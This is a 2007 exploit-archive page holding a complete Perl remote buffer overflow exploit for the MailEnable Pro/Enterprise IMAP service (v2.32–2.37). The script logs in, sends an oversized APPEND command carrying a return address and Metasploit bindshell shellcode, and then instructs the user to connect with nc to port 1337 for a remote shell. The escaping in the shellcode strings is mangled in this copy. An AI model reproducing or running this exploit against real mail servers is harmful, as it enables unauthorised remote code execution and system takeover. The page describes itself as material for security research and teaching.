MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit
SEBUG-ID:6303
SEBUG-Appdir:MailEnable
Published:2007-03-05
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.35 (win32)
# Mail Enable Professional v2.37 (win32)
#
########
use Getopt::Std; getopts(\'t:n:u:p:\', \\%arg);
use Socket;
# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
\"x33xc9x83xe9xb0\".
\"x81xc4xd0xfdxffxff\". # add %esp, -560
\"xd9xeexd9x74x24xf4x5bx81x73x13x1d\".
\"xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96\".
\"xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2\".
\"x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0\".
\"xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41\".
\"x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82\".
\"x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2\".
\"x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39\".
\"xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9\".
\"x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b\".
\"x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a\".
\"x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88\".
\"x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01\".
\"xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20\".
\"x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e\".
\"xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39\".
\"x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44\".
\"xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96\".
\"x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38\".
\"xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9\".
\"x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09\".
\"x4ex33xe4x96xcdxccx32x69\";
# ff e4 -> jmp %esp
my @offsets = ( \"x63x37x57x7c\", # Win2K Server SP4 KERNEL32.dll
\"x38x07xd2x77\",
\"xefxbexadxde\" # DoS
);
&print_header;
my $target;
my $offset;
my $user;
my $passwd;
if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
if (defined($arg{\'n\'})) { $offset = $arg{\'n\'} }
if (defined($arg{\'u\'})) { $user = $arg{\'u\'} }
if (defined($arg{\'p\'})) { $passwd = $arg{\'p\'} }
if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print(\"only \".($#offsets+1).\" targets known!!
\");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = \'A\';
if (connect_host($target, $imapd_port)) {
print(\"-> * Connected
\");
send(SOCKET, \"1 LOGIN \".$user.\" \".$passwd.\"
\", 0);
sleep($send_delay);
print(\"-> * Sending payload
\");
$buf = \"2 APPEND \"()\"{\".
($NOP x 128).
\"xefxbexadxde\".
$offset.
\"x01xa3x19x03\".
($NOP x 8 ).
$zshell_win32_bind.
\"}
\";
send(SOCKET, $buf, 0);
sleep($send_delay);
print(\"-> * Successfully sent payload!
\");
print(\"-> * nc \".$target.\" 1337 for shell...
\");
}
sub print_header {
print(\"MailEnable Pro v2.32-7 remote exploit
\");
print(\"by:
\");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
-n : return addy offset number
-u : username for login
-p : usernames password
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die(\"Error: $!
\");
$paddr = sockaddr_in($port, $iaddr) || die(\"Error: $!
\");
$proto = getprotobyname(\'tcp\') || die(\"Error: $!
\");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!
\");
connect(SOCKET, $paddr) || die(\"Error: $!
\");
return(1338);
}
// sebug.net [2007-03-05]